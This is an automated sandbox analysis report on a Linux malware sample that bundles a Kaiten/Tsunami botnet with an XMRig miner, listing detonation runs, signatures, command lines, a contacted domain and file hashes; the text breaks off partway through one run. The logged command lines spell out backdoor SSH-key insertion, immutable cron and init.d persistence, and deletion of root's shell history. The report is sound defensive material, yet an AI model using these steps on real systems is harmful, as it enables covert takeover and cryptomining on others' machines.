Malware Analysis Report

2024-11-13 17:22

Sample ID 241108-nqwp4s1jd1
Target myxmrig.tgz
SHA256 0de9266af49aab24256c289d39e86649d978d5a4c9d0ff2041a22140b88ea688
Tags
discovery upx persistence privilege_escalation kaiten botnet defense_evasion execution privilege_escalatio xmrig antivm miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0de9266af49aab24256c289d39e86649d978d5a4c9d0ff2041a22140b88ea688

Threat Level: Known bad

The file myxmrig.tgz was found to be: Known bad.

Malicious Activity Summary

discovery upx persistence privilege_escalation kaiten botnet defense_evasion execution privilege_escalatio xmrig antivm miner

Kaiten/Tsunami

Xmrig family

Kaiten family

Detects Kaiten/Tsunami payload

xmrig

Detects Kaiten/Tsunami Payload

XMRig Miner payload

Adds new SSH keys

Executes dropped EXE

File and Directory Permissions Modification

Writes file to system bin folder

Modifies init.d

Reads hardware information

Checks hardware identifiers (DMI)

Enumerates running processes

Attempts to change immutable files

Creates/modifies Cron job

UPX packed file

Security Software Discovery

Reads CPU attributes

Checks CPU configuration

Writes file to tmp directory

Process Discovery

System Network Configuration Discovery

Reads runtime system information

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 11:36

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsbe-20240611-en

Max time kernel

0s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsel-20240611-en

Max time kernel

0s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.mips

[./.mips -f]

Network

N/A

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 a0669fc7ed6e6c80a991b070e1f7909a
SHA1 313f4f3deaf4237a8d0059593f1a68d7b7cc434f
SHA256 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b
SHA512 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.systemd/.run]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.systemd/-bash /tmp/.systemd/-bash N/A

Enumerates running processes

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/648/cmdline /bin/ps N/A
File opened for reading /proc/679/cmdline /bin/ps N/A
File opened for reading /proc/476/status /bin/ps N/A
File opened for reading /proc/1119/stat /bin/ps N/A
File opened for reading /proc/174/cmdline /bin/ps N/A
File opened for reading /proc/414/cmdline /bin/ps N/A
File opened for reading /proc/183/cmdline /bin/ps N/A
File opened for reading /proc/533/stat /bin/ps N/A
File opened for reading /proc/1141/stat /bin/ps N/A
File opened for reading /proc/1091/stat /bin/ps N/A
File opened for reading /proc/668/cmdline /bin/ps N/A
File opened for reading /proc/1518/status /bin/ps N/A
File opened for reading /proc/30/cmdline /bin/ps N/A
File opened for reading /proc/31/status /bin/ps N/A
File opened for reading /proc/1336/cmdline /bin/ps N/A
File opened for reading /proc/1253/cmdline /bin/ps N/A
File opened for reading /proc/1284/stat /bin/ps N/A
File opened for reading /proc/18/status /bin/ps N/A
File opened for reading /proc/964/stat /bin/ps N/A
File opened for reading /proc/1136/status /bin/ps N/A
File opened for reading /proc/14/stat /bin/ps N/A
File opened for reading /proc/681/stat /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/1067/status /bin/ps N/A
File opened for reading /proc/1064/stat /bin/ps N/A
File opened for reading /proc/12/stat /bin/ps N/A
File opened for reading /proc/1237/cmdline /bin/ps N/A
File opened for reading /proc/182/cmdline /bin/ps N/A
File opened for reading /proc/964/status /bin/ps N/A
File opened for reading /proc/29/cmdline /bin/ps N/A
File opened for reading /proc/1253/status /bin/ps N/A
File opened for reading /proc/967/status /bin/ps N/A
File opened for reading /proc/1225/stat /bin/ps N/A
File opened for reading /proc/1237/cmdline /bin/ps N/A
File opened for reading /proc/25/stat /bin/ps N/A
File opened for reading /proc/1485/status /bin/ps N/A
File opened for reading /proc/35/status /bin/ps N/A
File opened for reading /proc/170/stat /bin/ps N/A
File opened for reading /proc/610/status /bin/ps N/A
File opened for reading /proc/679/status /bin/ps N/A
File opened for reading /proc/1/cmdline /bin/ps N/A
File opened for reading /proc/6/status /bin/ps N/A
File opened for reading /proc/278/status /bin/ps N/A
File opened for reading /proc/1284/stat /bin/ps N/A
File opened for reading /proc/1119/cmdline /bin/ps N/A
File opened for reading /proc/1178/status /bin/ps N/A
File opened for reading /proc/187/stat /bin/ps N/A
File opened for reading /proc/559/cmdline /bin/ps N/A
File opened for reading /proc/15/cmdline /bin/ps N/A
File opened for reading /proc/187/status /bin/ps N/A
File opened for reading /proc/1181/status /bin/ps N/A
File opened for reading /proc/179/cmdline /bin/ps N/A
File opened for reading /proc/417/status /bin/ps N/A
File opened for reading /proc/1305/cmdline /bin/ps N/A
File opened for reading /proc/32/cmdline /bin/ps N/A
File opened for reading /proc/445/status /bin/ps N/A
File opened for reading /proc/460/status /bin/ps N/A
File opened for reading /proc/679/stat /bin/ps N/A
File opened for reading /proc/1225/status /bin/ps N/A
File opened for reading /proc/30/stat /bin/ps N/A
File opened for reading /proc/1078/cmdline /bin/ps N/A
File opened for reading /proc/1141/cmdline /bin/ps N/A
File opened for reading /proc/717/cmdline /bin/ps N/A
File opened for reading /proc/2/stat /bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/-bash /bin/cp N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep -v R]

/bin/grep

[grep ssh$]

/bin/ps

[ps x]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep -v R]

/bin/grep

[grep sh$]

/bin/ps

[ps x]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .x86_64 -bash]

/tmp/.systemd/-bash

[./-bash]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/.systemd/-bash

MD5 92dc30d449f563a5bdbba08d4a9d57fc
SHA1 ff609eed2df786396203a8806400566df079cc7f
SHA256 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b
SHA512 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp

Files

/root/.ssh/authorized_keys

MD5 8fe44e7f210016f1a630679fe2379c1b
SHA1 2ca1d7e85c3f3f57e93c224df0d6765615969b25
SHA256 7e086e2e17f07dcf4f39288e348e14ec7cff52af7aca8b537ed13e2fb3fb4189
SHA512 981450e6206dcf76811bec0bc3fa8e87b2fd2ac3234754738a3220d29dc1a61b9e82a00ace865d21c365cc598b9caccf58686deb69be5820a52bcfb9b65eaa9c

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.x86_64

[./.x86_64 -f]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
GB 89.187.167.9:443 tcp

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 b6bd725d6b274dd0e0b8f5535fce571b
SHA1 419ef40db06a3220262166fa98db357c0ac017fa
SHA256 d2baa726c79e389cb82c2298f854d853aeebc175369f00a4d21eb3dbd03e8bcf
SHA512 c934ad46180bd3e3e3590658ed1f2cc55f48279a099d2bbf852c21af6840f04d9c41f47a8ddf5685e484f76730c4254d85c5c4b4561d9e3d33d1ec089f5e7578

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

1s

Max time network

132s

Command Line

[/tmp/.systemd/.i686]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/.systemd/.i686 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.ssh /tmp/.systemd/.i686 N/A

Processes

/tmp/.systemd/.i686

[/tmp/.systemd/.i686]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 pwn.pwndns.pw udp
CA 51.79.74.212:80 pwn.pwndns.pw tcp
US 8.8.8.8:53 731FD16D.DDED1D5.2CE4CC06.IP udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

1s

Max time network

132s

Command Line

[/tmp/.systemd/.x86_64]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/exe /tmp/.systemd/.x86_64 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.ssh /tmp/.systemd/.x86_64 N/A

Processes

/tmp/.systemd/.x86_64

[/tmp/.systemd/.x86_64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 pwn.pwndns.pw udp
CA 51.79.74.212:80 pwn.pwndns.pw tcp

Files

memory/2817-1-0x000077ec2b386000-0x000077ec2b39a760-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-mipsel-20240611-en

Max time kernel

0s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.systemd/auto]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.V7hfn5 /usr/bin/crontab N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/systemd.d /tmp/.systemd/auto N/A
File opened for modification /tmp/.systemd/.systemd /tmp/.systemd/auto N/A

Processes

/tmp/.systemd/auto

[/tmp/.systemd/auto]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/usr/bin/wc

[wc -l]

/bin/grep

[grep .systemd]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab systemd.d]

/bin/rm

[rm -rf systemd.d]

/bin/chmod

[chmod u+x .systemd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.8:443 tcp
US 1.1.1.1:53 odrs.gnome.org udp
US 1.1.1.1:53 odrs.gnome.org udp
GB 89.187.167.39:443 odrs.gnome.org tcp

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/var/spool/cron/crontabs/tmp.V7hfn5

MD5 c0cf181774a9fad926645284a3680db5
SHA1 af146029c4b74552e4bbcb3d6fac3efe25898394
SHA256 3d96819b05bc634c0a6c10307757c360512c9af8ff898ee2ae9014e20bffc5a5
SHA512 85b7dd7adcfc0b75596b43e5768e06f6e81914b007044286113bc5c26132bffcf2898c912cc492bdad977f1c4d86272fb4fc531fa1ccf5c70cc952721f1cc244

/tmp/.systemd/.systemd

MD5 31e12aacb4572270e99f912dfb4e1d2c
SHA1 942830707a5f7de945e4bf6192c2266bfd529018
SHA256 f54b32d1e82e3fa5af6e074fdeb416ac8b8581f2cf5ef357d94c9241815228fd
SHA512 be1d751a060eef9e6c5b4d5df4578b2b38631b813ce8d9f7d84563779a1168ce934dad06d39ff501adf47f219531b7a571accb9a857e716a42cb98057010a5d2

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

0s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

3s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/entpdate /usr/bin/tee N/A
File opened for modification /sbin/lntpdate /usr/bin/tee N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

143s

Command Line

[/tmp/.update/.x86_64]

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/.update/.x86_64 N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
